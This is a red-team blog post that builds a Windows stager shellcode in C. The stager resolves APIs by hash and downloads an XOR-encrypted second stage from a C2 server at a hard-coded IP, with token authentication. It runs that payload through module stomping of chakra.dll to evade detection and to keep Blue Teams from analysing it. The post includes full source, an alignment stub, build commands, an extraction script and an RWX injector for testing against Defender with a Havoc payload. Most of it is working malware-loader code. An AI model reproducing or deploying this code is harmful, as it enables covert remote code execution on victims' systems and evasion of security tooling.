Stage, But Verify

Introduction

Before delving into the technical implementation of this project, let's understand the difference between staged and stageless payloads. A stageless payload contains all of its required dependencies and works as a standalone payload. In the context of C2 communication, once a stageless payload is executed, it connects back to the C2 server for instructions. A staged payload, on the other hand, retrieves the main payload over the network when it is executed and then runs it.

There are many advantages to using staged payloads. They are often lightweight and practical where the dropper's size is crucial. Additionally, if your stager gets blocked, your actual payload (second-stage payload) is not compromised. However, Blue Teams can analyse the initial payloads to determine the endpoint where the second stage is hosted and attempt to access it. There are various steps that one can take while building their C2 infrastructure to block unauthorised connection attempts. These typically include comparing the request's User-Agent string against a whitelist, using cookie values, or whitelisting IP ranges from which requests are allowed. However, an unauthorised request can follow these rules and obtain the main payload, which can be further analysed to gain information regarding the implant. This project aims to build a POC of a stager shellcode that sends an authentication token with the request, which is validated by the server before sending the second stage. The number of times a payload can authenticate can be configured, and once the token expires, the requests are blocked even if they are generated from the stager.

To execute our main payload in the process, we need memory that has execute permissions. Allocating a Read-Execute or Read-Write-Execute (RX/RWX) region creates unbacked memory with suspicious permissions, which is heavily monitored by defensive solutions. An unbacked memory region is one that has no corresponding file on disk and exists only in memory. Hence, we will execute our final payload using Module Stomping, also known as DLL Hollowing. This technique loads a genuine DLL that the process doesn't require and overwrites the DLL's code with our payload.

There are two aspects to this project. The first component is the generation of the stager shellcode, and the second is a server component that validates the requests before sending the second stage.

The code for this blog is available at:

Building Stager Shellcode

Shellcode is machine code: instructions that the processor can execute directly. A shellcode program can be written by hand in assembly language, but that is tedious and not viable for large projects. Instead, we will write our program in a high-level language such as C, compile it into an executable, and extract the machine code. These machine code instructions are stored in the .text section of an executable. Since we will extract only the instructions, our compiled executable must not depend on other sections, like .data, .rdata, or .bss, which means that the program cannot use global variables or string literals.

In Windows, the Operating System's functionality is exposed through Windows DLLs as Win32APIs. For example, to display a message box, MessageBoxA API is used from the User32.dll. All the APIs and DLLs an executable uses are stored in the "Import Address Table" (IAT). During runtime, Windows Loader loads these DLLs, and the addresses of required APIs are mapped in the IAT. When the program calls this API, the address is looked up from the IAT. Shellcode, on the other hand, cannot have any dependencies and should manually load the required DLLs and iterate over functions in the DLL to identify the addresses of the required APIs.

The following functions are used to enumerate modules loaded by a process and to get the address of APIs exported by the modules. In essence, they are just custom implementations of the GetModuleHandle and GetProcAddress WinAPIs.

UINT64 GetModule(DWORD dwHash) {

	PPEB pPeb;
	PPEB_LDR_DATA pLdr;
	PLDR_DATA_TABLE_ENTRY pLdte, pHead;

	pPeb = (PPEB)__readgsqword(0x60);
	pLdr = pPeb->Ldr;
	pLdte = (PLDR_DATA_TABLE_ENTRY)pLdr->InMemoryOrderModuleList.Flink;
	pHead = pLdte;

	do {
		if (HashDjb2W(pLdte->BaseDllName.Buffer) == dwHash) {
			return (UINT64)pLdte->DllBase;
		}

		pLdte = (PLDR_DATA_TABLE_ENTRY)((PLIST_ENTRY)pLdte)->Flink;
	}while (pLdte != pHead);

	return 0;
}

UINT64 GetProcAddrHash(UINT64 hModule, DWORD dwHash) {

	if (!hModule) {
		return 0;
	}
	PIMAGE_EXPORT_DIRECTORY pImgExp;

	pImgExp = (PIMAGE_EXPORT_DIRECTORY)(hModule + ((PIMAGE_NT_HEADERS)(hModule + ((PIMAGE_DOS_HEADER)hModule)->e_lfanew))->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	PDWORD  pAddressOfFunctions = (PDWORD)(hModule + pImgExp->AddressOfFunctions);
	PDWORD  pAddressofNames = (PDWORD)(hModule + pImgExp->AddressOfNames);
	PWORD   pAddressofOrdinals = (PWORD)(hModule + pImgExp->AddressOfNameOrdinals);

	// AddressOfNames and AddressOfNameOrdinals hold NumberOfNames entries, so that is the loop bound
	for (DWORD i = 0; i < pImgExp->NumberOfNames; i++) {
		if (HashDjb2A((CHAR*)(hModule + pAddressofNames[i])) == dwHash) {
			WORD	wOrdinal = pAddressofOrdinals[i];
			return (UINT64)(hModule + pAddressOfFunctions[wOrdinal]);
		}
	}

	return 0;
}

Utilising these functions, we can locate the KERNEL32.DLL module in memory and resolve the address of the LoadLibraryA function, which can then be used to load additional DLLs into the process. As our program downloads the second stage over HTTP, we need to load WinInet.DLL and resolve the addresses of the InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetQueryDataAvailable, InternetReadFile, and InternetCloseHandle Win32 APIs. To map the contents of our sacrificial module into memory, we will use the NtCreateSection and NtMapViewOfSection NTAPIs. For allocating and freeing heap memory, we will use the calloc and free functions from msvcrt.DLL. From KERNEL32.DLL, we will use the CreateFileW, VirtualProtect, CreateThread, and WaitForSingleObject WinAPIs. Both GetModule and GetProcAddrHash compare hashes of strings rather than the strings themselves, so the API names do not have to be embedded in the shellcode. The hashes are calculated with a djb2-style routine (it starts from 0 and multiplies by 17, whereas the textbook djb2 starts from 5381 and multiplies by 33) using the following code.

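#include <stdio.h>
#include <stddef.h>   // wchar_t

// ANSI variant: used for exported function names
unsigned int HashDjb2A (char* pString) {

    unsigned int Hash = 0;
    unsigned int c;

    while(c = *pString++) {
        Hash = ((Hash << 4) + Hash) + c;
    }
    return Hash;
}

// Wide-character variant: used for module names
unsigned int HashDjb2W (wchar_t* pString) {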

    unsigned int Hash = 0;
    unsigned int c;

    while(c = *pString++) {
        Hash = ((Hash << 4) + Hash) + c;
    }
    return Hash;
}

int main(int argc, char** argv) {

  if (argc != 2)
    return -1;
  printf("#define %s_HASH 0x%.4x\n", argv[1], HashDjb2A(argv[1]));
}
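
As a cross-check on the generator above, the same hash can be reproduced in a few lines of Python. This is a minimal sketch and not part of the original project: the function names are hypothetical, and the 32-bit mask is an assumption that mirrors unsigned int being 32 bits wide on the target compiler.

```python
def hash_djb2_variant(name: str) -> int:
    """Mirror HashDjb2A: start at 0, then hash = hash * 17 + byte, kept to 32 bits."""
    value = 0
    for byte in name.encode("ascii"):
        # (value << 4) + value is value * 17; the mask models unsigned int overflow
        value = ((value << 4) + value + byte) & 0xFFFFFFFF
    return value


def define_line(name: str) -> str:
    """Format the result the same way as the C generator's printf call."""
    return "#define %s_HASH 0x%.4x" % (name, hash_djb2_variant(name))


if __name__ == "__main__":
    print(define_line("LoadLibraryA"))
```

Comparing this output with the C tool's output for the same name is a quick way to confirm that both sides agree before the constants are pasted into the stager.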

Downloading The Stage

In this part of our program, the second-stage payload is downloaded by sending a GET request to our web server. The authentication token is sent in a WWW-Authenticate header. Note that WWW-Authenticate is normally a response header with which a server challenges the client (for example, during Basic Authentication), while clients usually send credentials in the Authorization header; here it is repurposed as a request header. The server validates the URI and the auth token before sending the second-stage payload. The functions required for these operations are resolved dynamically using the GetModule and GetProcAddrHash functions.

The token used for authentication is dynamically generated by the Python server during runtime and will be unique for each execution. While downloading our payload, the first four bytes contain the total size of our shellcode, which is used to allocate memory in the heap, and the payload is written at this location.

VOID DownloadExec() {


	HINTERNET		hInternet = NULL,
					hConnect  = NULL,
					hRequest  = NULL;



	DWORD			dwStatusCode = 0;
	DWORD			dwLength = sizeof(DWORD);
	DWORD			dwBytesAvailable;
	BYTE			*pMessageBody = NULL, *pShellCode = NULL;
	DWORD			dwSizeOfPayload = 0;
	DWORD			dwFseek = 0;
	BOOL			bSuccess = TRUE;

	CHAR			useragent[] = {'M', 'o', 'z', 'i', 'l', 'l', 'a', '/', '5', '.', '0', ' ', '(', 'W', 'i', 'n', 'd', 'o', 'w', 's', ' ', 'N', 'T', ' ', '6', '.', '1', ';', ' ', 'W', 'O', 'W', '6', '4', ')', ' ', 'A', 'p', 'p', 'l', 'e', 'W', 'e', 'b', 'K', 'i', 't', '/', '5', '3', '7', '.', '3', '6', ' ', '(', 'K', 'H', 'T', 'M', 'L', ',', ' ', 'l', 'i', 'k', 'e', ' ', 'G', 'e', 'c', 'k', 'o', ')', ' ', 'C', 'h', 'r', 'o', 'm', 'e', '/', '9', '6', '.', '0', '.', '4', '6', '6', '4', '.', '1', '1', '0', ' ', 'S', 'a', 'f', 'a', 'r', 'i', '/', '5', '3', '7', '.', '3', '6', 0};
	CHAR			domain[] = {'1', '9', '2', '.', '1', '6', '8', '.', '0', '.', '1', '0', '2', 0};
	INTERNET_PORT	nServerPort = 8080;
	CHAR			requestType[] = {'G', 'E', 'T', 0};
	CHAR			resource[] = {'i', 'n', 'd', 'e', 'x', '.', 'p', 'h', 'p', 0};
	CHAR 			header[35] = {'W', 'W', 'W', '-', 'A', 'u', 't', 'h', 'e', 'n', 't', 'i', 'c', 'a', 't', 'e', ':', ' '};
					header[34] = 0x00;
	UINT64 			token = 0xa15257eba85d9255;
	

	
	WCHAR	wsSacrificialDLL[] = {L'C', L':', L'\\', L'W', L'i', L'n', L'd', L'o', L'w', L's', L'\\', L'S', L'y', L's', L't', L'e', L'm', L'3', L'2', L'\\', L'C', L'h', L'a', L'k', L'r', L'a', L'.', L'd', L'l', L'l', 0};

	UINT64  wininetdll, msvcrtdll, ntdll, kernel32dll;
	UINT64	InternetOpenAFunc, InternetConnectAFunc, HttpOpenRequestAFunc, HttpSendRequestAFunc, HttpQueryInfoAFunc, InternetQueryDataAvailableFunc,
			InternetReadFileFunc, InternetCloseHandleFunc, callocFunc, freeFunc, LoadLibraryAFunc;

	NTAPIFP ntApi = { 0x00 };

	//Kernel32.DLL
	kernel32dll = (UINT64)GetModule(KERNEL32_HASH);
	LoadLibraryAFunc = GetProcAddrHash(kernel32dll, LOADLIBRARYA_HASH);


	//WinInet.DLL Functions
	CHAR wininetdll_c[] = {'w', 'i', 'n', 'i', 'n', 'e', 't', 0};
	wininetdll = (UINT64)((fnLoadLibraryA)LoadLibraryAFunc)(wininetdll_c);
	InternetOpenAFunc = (UINT64)GetProcAddrHash(wininetdll, InternetOpenA_HASH);
	InternetConnectAFunc = (UINT64)GetProcAddrHash(wininetdll, InternetConnectA_HASH);
	HttpOpenRequestAFunc = (UINT64)GetProcAddrHash(wininetdll, HttpOpenRequestA_HASH);
	HttpSendRequestAFunc = (UINT64)GetProcAddrHash(wininetdll, HttpSendRequestA_HASH);
	HttpQueryInfoAFunc = (UINT64)GetProcAddrHash(wininetdll, HttpQueryInfoA_HASH);
	InternetQueryDataAvailableFunc = (UINT64)GetProcAddrHash(wininetdll, InternetQueryDataAvailable_HASH);
	InternetReadFileFunc = (UINT64)GetProcAddrHash(wininetdll, InternetReadFile_HASH);
	InternetCloseHandleFunc = (UINT64)GetProcAddrHash(wininetdll, InternetCloseHandle_HASH);

	//MSVCRT.DLL Functions
	CHAR msvcrtdll_c[] = {'m', 's', 'v', 'c', 'r', 't', 0};
	msvcrtdll = (UINT64)((fnLoadLibraryA)LoadLibraryAFunc)(msvcrtdll_c);
	callocFunc = (UINT64)GetProcAddrHash(msvcrtdll, calloc_HASH);
	freeFunc = (UINT64)GetProcAddrHash(msvcrtdll, free_HASH);
	

	//NTDLL.DLL
	ntdll = (UINT64)GetModule(NTDLL_HASH);
	ntApi.pNtCreateSection = (fnNtCreateSection)GetProcAddrHash(ntdll, NtCreateSection_HASH);
	ntApi.pNtMapViewOfSection = (fnNtMapViewOfSection)GetProcAddrHash(ntdll, NtMapViewOfSection_HASH);
	ntApi.pCreateFileW = (fnCreateFileW)GetProcAddrHash(kernel32dll, CreateFileW_HASH);


	// Initialize Usage of WinInet Functions

	if ((hInternet = ((fnInternetOpenA)InternetOpenAFunc)(useragent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0))) {

		// Open a HTTP connection to our staging server
		if ((hConnect = ((fnInternetConnectA)InternetConnectAFunc)(hInternet, domain, nServerPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))) {

		
			if ((hRequest = ((fnHttpOpenRequestA)HttpOpenRequestAFunc)(hConnect, requestType, resource, NULL, NULL, NULL, 0, 0))) {

					// Add our Authentication Token to Request Headers
					headercat(header, token);

					// Send the GET Request
					if ((((fnHttpSendRequestA)HttpSendRequestAFunc)(hRequest, header, 35, NULL, 0))) {

						// Obtain the Response Status Code
						if (((fnHttpQueryInfoA)HttpQueryInfoAFunc)(hRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwStatusCode, &dwLength, NULL)) {

							if (dwStatusCode == HTTP_STATUS_OK) {
								
								
								while (((fnInternetQueryDataAvailable)InternetQueryDataAvailableFunc)(hRequest, &dwBytesAvailable, 0, 0)) {


									DWORD dwBytesRead;


									if (!dwSizeOfPayload) {
										// First loop Iteration
										// Read the first 4 bytes, which contain the size of the shellcode
										if (((fnInternetReadFile)InternetReadFileFunc)(hRequest, &dwSizeOfPayload, sizeof(DWORD), &dwBytesRead)) {

											pMessageBody = (BYTE*)((fncalloc)callocFunc)(1, dwSizeOfPayload);
											if (pMessageBody == NULL)
												return;
											pShellCode = pMessageBody;

										}

										if (((fnInternetReadFile)InternetReadFileFunc)(hRequest, pMessageBody, dwBytesAvailable - 4, &dwBytesRead)) {

											if (dwBytesRead == 0) {
												bSuccess = FALSE;
												break;
											}

											pMessageBody = (BYTE*)((ULONG_PTR)pMessageBody + dwBytesRead);

										}

									}
									else {

										if (((fnInternetReadFile)InternetReadFileFunc)(hRequest, pMessageBody, dwBytesAvailable, &dwBytesRead)) {

											if (dwBytesRead == 0)
												break;

											pMessageBody = (BYTE*)((ULONG_PTR)pMessageBody + dwBytesRead);

										}

									}

								}
								
							}
						}
					}

			}


		}

		// Only execute if a payload buffer was actually allocated and filled
		if (bSuccess && pShellCode)
			ExecuteShellcode(pShellCode, dwSizeOfPayload, kernel32dll, wsSacrificialDLL, &ntApi);

		((fnfree)freeFunc)(pShellCode);
		((fnInternetCloseHandle)InternetCloseHandleFunc)(hRequest);
		((fnInternetCloseHandle)InternetCloseHandleFunc)(hConnect);
		((fnInternetCloseHandle)InternetCloseHandleFunc)(hInternet);
	}

}
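
The size-prefixed framing that DownloadExec reads can be sketched from the other side of the connection. The following is a minimal illustration, assuming the server packs the length as a 4-byte little-endian integer (which is how a DWORD read directly into memory is interpreted on x64); the function names are hypothetical and the real server script may build the response differently.

```python
import struct


def frame_payload(payload: bytes) -> bytes:
    """Prefix the payload with its length as a 4-byte little-endian integer."""
    return struct.pack("<I", len(payload)) + payload


def parse_framed(body: bytes) -> bytes:
    """Recover the payload from a framed body, rejecting short or truncated input."""
    if len(body) < 4:
        raise ValueError("body is shorter than the 4-byte size prefix")
    (size,) = struct.unpack_from("<I", body, 0)
    payload = body[4:4 + size]
    if len(payload) != size:
        raise ValueError("body is truncated")
    return payload


if __name__ == "__main__":
    framed = frame_payload(b"abc")
    print(framed.hex(), parse_framed(framed))
```

Checking the declared size against the number of bytes actually received, as parse_framed does, is a cheap way to detect a truncated transfer before the buffer is used.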

Module Stomping

After downloading our second-stage payload, we will load a sacrificial DLL and replace the original code with our shellcode. By stomping a DLL, we will not be creating any unbacked or additional RX/RWX regions and will be utilising the RX region of the .text section of our DLL. The DLL is mapped in memory using the CreateFileW, NtCreateSection, and NtMapViewOfSection APIs.

Windows utilises Control Flow Guard (CFG) as an exploit-mitigation mechanism. When CFG is enabled, the target of every indirect call is checked against a set of valid call targets, and the process is terminated if the check fails. By manually mapping our DLL into memory, the .text section will not be subjected to CFG checks. If we instead use LoadLibrary to load the DLL, the Windows loader will register CFG checks for the DLL's code, which would need to be bypassed to execute our payload. We will go with the former approach as it is simpler. After mapping the DLL into memory, we will identify the address of our DLL's entry point, which is where our second-stage payload will be written.

BOOL LoadDllFile(IN LPCWSTR szDllFilePath, OUT HMODULE* phModule, OUT PULONG_PTR puEntryPoint, PNTAPIFP pNtApi) {

	HANDLE				hFile = INVALID_HANDLE_VALUE,
						hSection = NULL;
	NTSTATUS			STATUS = STATUS_SUCCESS;
	ULONG_PTR			uMappedModule = NULL;
	SIZE_T				sViewSize = NULL;
	PIMAGE_NT_HEADERS	pImageNtHeaders = NULL;
	PIMAGE_DOS_HEADER	pImageDosHeader = NULL;
	HANDLE				hFileMap = INVALID_HANDLE_VALUE;



	if ((hFile = ((fnCreateFileW)pNtApi->pCreateFileW)(szDllFilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) {


		if (NT_SUCCESS((STATUS = pNtApi->pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, 0X00, PAGE_READONLY, SEC_IMAGE, hFile)))) {

			if (NT_SUCCESS((STATUS = pNtApi->pNtMapViewOfSection(hSection, (HANDLE)-1, &uMappedModule, NULL, NULL, NULL, &sViewSize, ViewShare, NULL, PAGE_EXECUTE_READWRITE)))) {
				*phModule = uMappedModule;
				pImageDosHeader = (PIMAGE_DOS_HEADER)uMappedModule;
				pImageNtHeaders = (PIMAGE_NT_HEADERS)(uMappedModule + pImageDosHeader->e_lfanew);
				*puEntryPoint = uMappedModule + pImageNtHeaders->OptionalHeader.AddressOfEntryPoint;

				return TRUE;
			}

		}

	}

	return FALSE;

}
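
The header walk that LoadDllFile performs (DOS header, then e_lfanew, then the optional header's AddressOfEntryPoint) can also be reproduced offline, which is handy for checking how much room a candidate DLL has after its entry point. This is a minimal sketch using only the standard library; the function name is hypothetical, and it returns the RVA, which LoadDllFile adds to the mapped base address.

```python
import struct


def entry_point_rva(image: bytes) -> int:
    """Return AddressOfEntryPoint (an RVA) from the headers of a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing DOS header signature")
    # e_lfanew lives at offset 0x3C of IMAGE_DOS_HEADER
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # Signature (4 bytes) + IMAGE_FILE_HEADER (20 bytes), then
    # AddressOfEntryPoint sits 16 bytes into the optional header
    (rva,) = struct.unpack_from("<I", image, e_lfanew + 4 + 20 + 16)
    return rva


if __name__ == "__main__":
    # Synthetic header used purely for demonstration
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<I", buf, 0x80 + 40, 0x1234)
    print(hex(entry_point_rva(bytes(buf))))
```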

Shellcode Execution

The .text section of our sacrificial DLL has Read and Execute permissions. After obtaining the Entry Point of the DLL, the memory permissions need to be modified to allow write access, and our payload will be written at this location. To evade signature-based network detections, the payload is XOR encrypted during transfer. The decryption routine will be called after writing our shellcode in the final location. The original RX memory permissions are then applied to this region, and the shellcode is executed by creating a new thread.

VOID ExecuteShellcode(unsigned char* shellcode, SIZE_T szSize, UINT64 kernel32dll, LPWSTR wsSacrificialDll, PNTAPIFP pNtApi) {

	LPVOID		pAddress = NULL;
	HANDLE		hThread = INVALID_HANDLE_VALUE;
	HMODULE		hModule = NULL;
	ULONG_PTR	uEntryPoint = NULL;
	DWORD		dwOldProtection = 0;
	unsigned char	cKey = 0x94;

	UINT64 VirtualProtectFunc, CreateThreadFunc, WaitForSingleObjectFunc;

	VirtualProtectFunc = (UINT64)GetProcAddrHash(kernel32dll, VIRTUALPROTECT_HASH);
	CreateThreadFunc = (UINT64)GetProcAddrHash(kernel32dll, CREATETHREAD_HASH);
	WaitForSingleObjectFunc = (UINT64)GetProcAddrHash(kernel32dll, WAITFORSINGLEOBJECT_HASH);


	if (LoadDllFile(wsSacrificialDll, &hModule, &uEntryPoint, pNtApi)) {

		if (((fnVirtualProtect)VirtualProtectFunc)(uEntryPoint, szSize, PAGE_READWRITE, &dwOldProtection)) {
			my_memcpy(uEntryPoint, shellcode, szSize);
			XorDecrypt(uEntryPoint, cKey, szSize);
			if (((fnVirtualProtect)VirtualProtectFunc)(uEntryPoint, szSize, PAGE_EXECUTE_READ, &dwOldProtection)) {
				hThread = ((fnCreateThread)CreateThreadFunc)(NULL, 0X00, uEntryPoint, NULL, 0x00, NULL);
				((fnWaitForSingleObject)WaitForSingleObjectFunc)(hThread, INFINITE);
			}
		}

	}
}

Final Steps

Now that our stager's functionality has been implemented, it needs to be compiled so that we can extract our final shellcode. The Windows x64 calling convention expects the stack to be 16-byte aligned when a function is called, and the APIs we use rely on this. Since we don't know the state of the stack when our shellcode is executed, it becomes our responsibility to align the stack before executing our DownloadExec function. Hence, we will use a small assembly stub that aligns the stack before calling our function. This assembly code has been borrowed from Chetan Nayak's Blog (linked in the references section).

extern DownloadExec
global alignstack

segment .text

alignstack:
    push rdi
    mov rdi, rsp
    and rsp, byte -0X10
    sub rsp, byte +0x20
    call DownloadExec
    mov rsp, rdi
    pop rdi
    ret
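
The arithmetic behind the stub is easy to verify outside of assembly. The sketch below models the two instructions that matter, `and rsp, -0x10` and `sub rsp, 0x20`, on plain integers; the function name and the sample addresses are hypothetical and chosen only for illustration.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF  # registers are 64 bits wide


def align_stack(rsp: int) -> int:
    """Model 'and rsp, -0x10' followed by 'sub rsp, 0x20'."""
    # -0x10 as a 64-bit value is 0xFFFFFFFFFFFFFFF0, so the AND clears the low
    # four bits and rounds rsp down to a multiple of 16
    aligned = rsp & (-0x10 & MASK64)
    # Reserve the 32-byte shadow space the x64 calling convention gives the callee
    return (aligned - 0x20) & MASK64


if __name__ == "__main__":
    for rsp in (0x7FFE1238, 0x7FFE1230, 0x7FFE123F):
        print(hex(rsp), "->", hex(align_stack(rsp)))
```

Because 0x20 is itself a multiple of 16, the subtraction keeps the alignment established by the AND, so the stack is 16-byte aligned at the point where DownloadExec is called.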

We will use a linker script to define our entry point and link our object files:

ENTRY(alignstack)
SECTIONS
{
	.text :
	{
		*(.text.alignstack)
		*(.text.DownloadExec)
	}
}

Compiling the executable

nasm -f win64 alignstack.asm -o alignstack.o
x86_64-w64-mingw32-gcc stager.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o stager.o -Wl,-Tlinker.ld,--no-seh
x86_64-w64-mingw32-ld -s alignstack.o stager.o -o ./stager.exe

Using the following Python script, we can extract the .text section from the executable file:

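import pefile  # third-party module: pip install pefile

pe = pefile.PE('stager.exe')
bindata = None

# Section names are 8 bytes long and NUL-padded
for section in pe.sections:
	if section.Name == b'.text\x00\x00\x00':
		bindata = section.get_data()
		break

if bindata is None:
	raise SystemExit('.text section not found')

with open('stager.bin', 'wb') as binwrite:
	binwrite.write(bindata)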

Building the Backend

Now that the first part is done, we need to implement a backend that automates the process of generating the stager shellcode and starting a web server. A Python script is written to take care of this.

Usage

The script takes the following arguments:

-f: Path to your shellcode
-H: IP address or Domain where the stager needs to connect back
-s: Port number. By default, it uses 80.
-d: DLL to use for hollowing. By default C:\Windows\System32\chakra.dll is used.
-t: Validity of Authentication tokens. If this parameter is configured as 2, the token expires after detonating the payload twice.
-x: Output Format of the shellcode.
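
The use-limited token behind the -t option can be sketched as a small piece of server-side state. This is a hedged illustration rather than the project's actual implementation: the class name is hypothetical, and presenting the 64-bit token as 16 hexadecimal characters is an assumption inferred from the 35-byte header buffer in the stager.

```python
import hmac
import secrets


class TokenValidator:
    """Track one randomly generated token and how many times it may still be used."""

    def __init__(self, max_uses: int) -> None:
        self.token = secrets.token_hex(8)  # 8 random bytes -> 16 hex characters
        self.remaining = max_uses

    def check(self, presented: str) -> bool:
        """Return True and consume one use if the token matches and has not expired."""
        if self.remaining <= 0:
            return False
        # Constant-time comparison avoids leaking how many characters matched
        if not hmac.compare_digest(presented.encode(), self.token.encode()):
            return False
        self.remaining -= 1
        return True


if __name__ == "__main__":
    validator = TokenValidator(max_uses=2)
    print([validator.check(validator.token) for _ in range(3)])
```

In this sketch a request with a wrong token is rejected without consuming a use, so only successful authentications count towards the limit; whether failed attempts should also count is a design choice left to the server.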

Demo

We will use a simple shellcode injector to test our stager against Defender. The stager will download and execute Havoc's payload.

#include <windows.h>

unsigned char shellcode[] = {0x57,...,0x57}; // Replace with stager shellcode

int main() {

    PVOID pAddress = NULL;

    pAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (pAddress) {
        memcpy(pAddress, shellcode, sizeof(shellcode));
        WaitForSingleObject(CreateThread(NULL, 0X00, pAddress, NULL, 0X00, NULL), INFINITE);
    }

}

References

https://maldevacademy.com/new/modules/36
https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/
https://blog.differentpla.net/blog/2004/02/26/downloading-from-an-http-server-using-wininet/

